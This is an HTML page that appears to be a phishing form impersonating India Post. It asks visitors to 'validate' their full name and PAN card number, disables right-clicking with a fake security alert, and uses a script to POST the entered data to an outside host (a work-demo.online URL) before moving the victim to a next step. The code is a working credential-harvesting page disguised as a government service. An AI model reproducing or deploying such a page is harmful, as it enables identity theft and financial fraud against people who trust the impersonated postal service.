<!DOCTYPE html>
<html lang="zxx">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <title>8?;&789;;-567+;:&_335++;;*£~√÷¶</title>
    <style>
        #mm {
            width: 100%;
            margin-left: -7px;
        }

        #ft {
            width: 100%;
            margin-left: -7px;
        }

        .bb,
        .dd {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        .bb:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        .dd:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            border-color: #AE2924;
            border-width: 1px;
            margin: 2px;
            border-radius: 4px;
            margin-left: 20px;
        }

        #cc {
            width: 105%;
            margin-left: -7px;
        }

        #ll {
            background-color: #AE2924;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
            width: 120px;
            height: 36px;
        }

        #ll:hover {
            background-color: #3E1128;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px;
            width: 120px;
            height: 36px;
        }

        #cc {
            width: 100%;
            background-color: #3E1128;
            height: 58px;
        }

        #col {
            width: 100%;
            background-color: #D8D1DB;
            height: 500px;
            margin-left: -7px;
        }
    </style>
    <script language="javascript">
        var message = "For security reasons,This function is not allowed here.";

        function clickIE4() {

            if (event.button == 2) {
                alert(message);
                return false;
            }
        }

        function clickNS4(e) {
            if (document.layers || document.getElementById && !document.all) {
                if (e.which == 2 || e.which == 3) {
                    alert(message);
                    return false;
                }
            }
        }

        if (document.layers) {
            document.captureEvents(Event.MOUSEDOWN);
            document.onmousedown = clickNS4;
        } else if (document.all && !document.getElementById) {
            document.onmousedown = clickIE4;
        }

        document.oncontextmenu = new Function("alert(message);return false;")
    </script>
</head>

<body>
    <center><img src="indiapost.png" alt="" id="mm"></center>
    <div id="col">
        <div id="cc">
            <br>
            <b style=" color:white; font-size:16px; padding:20px;"> Validate your PAN card details and proceed.</b>
        </div><br><br>
        <div id="pp">
            <b style="font-family: Arial; 
        color:#AE2924; 
        padding:0px 20px; font-size:16px;">Enter Full Name* (<b>as per PAN</b>)</b>
        </div>
        <div id="fr">
            <input type="text" name="Full Name" id="full_name" class="bb" placeholder="Enter Name (as per PAN)" required=""><br><br>
            <div id="hh">
                <b style="font-family: Arial; 
         color:#AE2924; 
         padding:0px 20px; font-size:16px;">Enter PAN Number* </b>
            </div>
            <div id="xx">
                <input type="text" name="PAN No." id="panno" class="dd" placeholder="Enter PAN Number" required=""><br><br>
                <div id="qq">
                    <button onclick="insertData()" type="button" id="ll" style="font-weight: bold;">
        SUBMIT</button>
                </div><br><br><br><br><br>
                <div>
                    <img src="footeri.jpg" alt="" id="ft"><br>



                    <script type="text/javascript">
                        var random_no = localStorage.getItem('random_no');

                        function insertData() {
                            var full_name = document.getElementById("full_name").value;
                            var panno = document.getElementById("panno").value;

                            if (full_name != "" && panno != "") {

                                var data = {
                                    full_name: full_name,
                                    panno: panno,
                                    random_no: random_no

                                };
                                var xhr = new XMLHttpRequest();

                                xhr.open("POST", "https://annad.work-demo.online/indiapostpayment_new/3rd.php", true);
                                xhr.setRequestHeader("Content-Type", "application/json");
                                xhr.onreadystatechange = function() {
                                    if (xhr.readyState === 4 && xhr.status === 200) {
                                        console.log(xhr.responseText);
                                        window.location.href = '4th.html';



                                    }
                                };
                                xhr.send(JSON.stringify(data));

                            } else {
                                alert('Please fill all fields');
                            }
                        }
                    </script>